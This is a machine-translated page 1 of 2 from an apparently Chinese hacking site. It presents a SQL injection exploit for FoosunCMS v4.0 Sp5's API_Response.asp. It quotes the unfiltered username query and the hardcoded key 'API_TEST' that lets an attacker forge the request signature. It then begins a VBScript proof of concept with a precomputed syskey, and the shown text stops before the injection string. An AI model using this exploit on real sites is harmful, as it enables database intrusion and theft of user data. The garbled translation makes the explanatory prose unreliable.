Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > crack analyzes > Content
Hot Articles
GE-Fanuc CIMPLICITY w32r
CA BrightStor ARCserve B
Apple iPhone Passcode Lo
Apple iPhone Passcode Lo
BitTorrent and uTorrent
FoosunCMS Sql Injection
KMail password encryptio
Rainbow awareness tool t
IE7 0Day crack analysis
Roams through three secu
Discuz! NT 2.5 pour into
Cracking the password pr
Ghost has the crack mirr
phpinfo cross station sc
Tomcat crack's analysis
Recommend Articles
Roams through three secu
FoosunCMS Sql Injection
In PHPCMS2.4 an interest
World browser local xss
Z-blog cross station scr
About XSS crack another
hzhost hypothesized main
php the escapeshellcmd m
Thunderclap ActiveX cont
360 security browser loc
The third party browser
The careful character re
Maxthon roams through br
Yahoo! Statistical funct
Using sohu website URL s
New Articles
The H?to half of all mal
Capital protects eyes cr
Agents of the secret net
fingerPIN launches multi
Tips to supply household
OCS Resolution Security
Spyware attacks tripled
Drink and drug driving c
Forgot your password?has
PKWARE PartnerLink membe
Masternaut provides live
Troj / Erazer-A Trojan i
Hacker of 21?Years old,
Free Firefox anti-phishi
Cyber-criminals are not
FoosunCMS Sql Injection Vulnerability
  Add date: 07/08/2008   Publishing date: 07/08/2008   Hits: 249
Total 2 pages, Current page:1, Jump to page:
 
--==+=================== www.nspcn.org =================+==--
--==+ FoosunCMS (API_Response.asp) Remote SQL Injection Exploit +==--
--==+===================================================+==--

#Author: Tr4c3[at]126[dot]com
# all rights reserved: http://www.nspcn.org & [BK instantaneous group]
# crack document API/API_Response.asp
# influence edition: v4.0 Sp5 [other editions had not looked]

# crack reason:
Variable username has not passed on the value after the filtration, leads the sql execution, causes to pour into the production.
# essential code:

If CheckPost() Then
Select Case Act
Case “checkname” triggering pours into
Checkname()

The CheckPost() function prototype is an expert to good expert 73-96, username to gain the value from this, the code is as follows:

XmlDoc.documentElement.selectSingleNode (“username”)

The Checkname() function is an expert to good expert 233-254, the code is as follows:

Sub Checkname()
Dim UserEmail
Dim Temp_tr, i, Rs, Sql
UserEmail = Trim (XmlDoc.documentElement.selectSingleNode (“email”) .text)
If Messenge<> "" Then
Output error information
Status = 1
Exit Sub
End If
Sql= " select UserName, Email From FS_ME_Users where UserName = “& UserName & "" leads the sql execution in this
Set Rs = User_Conn.Execute(Sql)
If Not Rs.Eof And Not Rs.Bof Then
Messenge = “you fill in user already registered.”
Status = 1
Exit Sub
Else
Status = 0
Messenge = “the confirmation passes.”
End If
Rs.Close
Set Rs = Nothing
End Sub

Using the key lies in lets CheckPost() is really, the code is as follows:

Dim NewMd5, OldMd5
NewMd5 = Md5(UserName&API_SysKey,16) Const API_SysKey = “API_TEST”
OldMd5 = Md5(UserName&API_SysKey,16)

If Syskey=NewMd5 or Syskey=OldMd5 Then
CheckPost = True
Else
Status = 1
Messenge = Messenge & “the <li> request data confirmation does not pass, please relate with the manager.”
End If

API_SysKey 16 lines is established in Api_Config.asp

Const API_SysKey = “API_TEST”

After poured into sentence & API_SysKey to carry on md5 encryption 16 hash, the evaluation gives syskey to be possible.
###Poc:

Rem - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem rumor 4.0 sp5[mssql] pours into the crack to test script By Tr4c3[at]126[dot]com
Rem more information please pay attention:
Rem net peaceful battleline http//www.nspcn.org/
Rem web security handbook http//www.tr4c3.com/
Rem BK instantaneous [qq group]
The Rem reprint please retain the above copyright
Dim strData, strUrl, strGetinfo, xPost
strData = “<body><userip>999.999.999.999</userip><email>body@baidu.com</email><action>checkname</action>
<syskey>b77c8e0d7a0784d5</syskey><appid>FoosunCMS</appid><username></username></body>”

 
Other pages: : 1 * 2 * Next>>
Prev:Roams through three security cracks which already repaired to analyze Next:In PHPCMS2.4 an interesting hole hole

Comment:

Category: Home > crack analyzes
Home